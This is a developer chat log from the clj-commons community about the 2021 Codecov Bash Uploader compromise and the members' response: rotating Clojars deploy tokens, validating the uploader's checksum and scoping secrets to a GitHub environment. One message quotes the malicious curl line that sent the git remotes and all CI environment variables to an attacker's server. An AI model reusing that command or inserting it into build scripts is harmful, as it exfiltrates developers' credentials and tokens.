clj-commons

borkdude 2021-04-16T14:22:00.000400Z

re: code coverage, geez, I'm happy I disabled this service a while ago. https://www.security.nl/posting/699462/Script+softwarebedrijf+Codecov+twee+maandenlang+voorzien+van+malware

lread 2021-04-16T14:43:34.000900Z

From https://about.codecov.io/security-update/:
> Out of an abundance of caution, if you used the Bash Uploaders between January 31, 2021 and April 1, 2021 and did not conduct a checksum validation of the Bash Uploader, we would suggest you re-roll all of your credentials, tokens, or keys located in the environment variables in your CI process.

lread 2021-04-16T14:45:44.001500Z

Note: I do use codecov from clj-commons/rewrite-clj.

borkdude 2021-04-16T14:47:57.001800Z

And did you get an e-mail? Or did you not use this script?

lread 2021-04-16T14:51:05.004300Z

Yup, https://github.com/clj-commons/rewrite-clj/blob/7621126caae5f21dc5150d52a6c9b747dc0aeeff/.github/workflows/code-coverage.yml#L49. Since this is a clj-commons project it might not be me who would get an email.

borkdude 2021-04-16T14:51:33.005100Z

Perhaps someone else got an e-mail, @slipset?

lread 2021-04-16T14:53:20.006100Z

But I also used it for rewrite-cljc I think during their window of infection… still no email… so… but they are recommending an update of credentials regardless…

lread 2021-04-16T14:55:27.006600Z

Their bash script was altered to upload the env vars:
> curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://<redacted>/upload/v2 || true

borkdude 2021-04-16T14:55:37.006800Z

:(

borkdude 2021-04-16T14:55:48.007100Z

do you have sensitive env vars set in those projects?

borkdude 2021-04-16T14:55:52.007300Z

e.g. clojars deploy tokens?

lread 2021-04-16T14:56:38.008200Z

Ya… there are the CLOJARS tokens. I’ll refresh those. Not sure what else I need to change for GitHub Actions.

lread 2021-04-16T14:58:00.008800Z

I’ll review codecov docs to see if they’ve updated how their uploader script should be used as well.

lread 2021-04-16T15:02:10.009500Z

Ya, they document validating the script now: https://docs.codecov.io/docs/about-the-codecov-bash-uploader#validating-the-bash-script. I’ll also add that in.

lread 2021-04-16T16:18:21.012200Z

Ok, there’s also a newish feature up on GitHub. You can create an environment for a repo. This environment can hold secrets and can be referenced by a GitHub Actions workflow. So I deleted the repo-scoped deployment secrets, and now have a release environment that only the release workflow has access to.

borkdude 2021-04-16T16:25:30.014100Z

👍

slipset 2021-04-16T18:20:19.016Z

I did get the email. I guess I need to cycle the Clojars token we use for deploys. Possibly also the cert I use for signing artefacts.

borkdude 2021-04-16T18:24:24.016400Z

eh yes....

borkdude 2021-04-16T18:24:41.016700Z

the entire clj-commons could be compromised this way?

slipset 2021-04-16T18:36:58.020100Z

Ah, but no. rewrite-clj uses GitHub Actions; none of the other clj-commons projects do that. They use Circle. And none of the other clj-commons projects use codecov.

lread 2021-04-16T18:37:34.020900Z

I’ve already cycled deploy tokens for rewrite-clj

borkdude 2021-04-16T18:37:39.021Z

@slipset but none of the rewrite-clj secrets, etc. are used in other projects? Like the cert?

slipset 2021-04-16T18:39:15.023100Z

Nope. Rewrite doesn’t sign AFAIK, and the deploy tokens are generated by @lee, so they are different from the ones I use.

lread 2021-04-16T18:39:35.023400Z

Yup, correct, rewrite-clj does not sign.

borkdude 2021-04-16T18:45:24.023600Z

ok, all good then, thanks

slipset 2021-04-16T18:45:40.024100Z

Thank you for checking.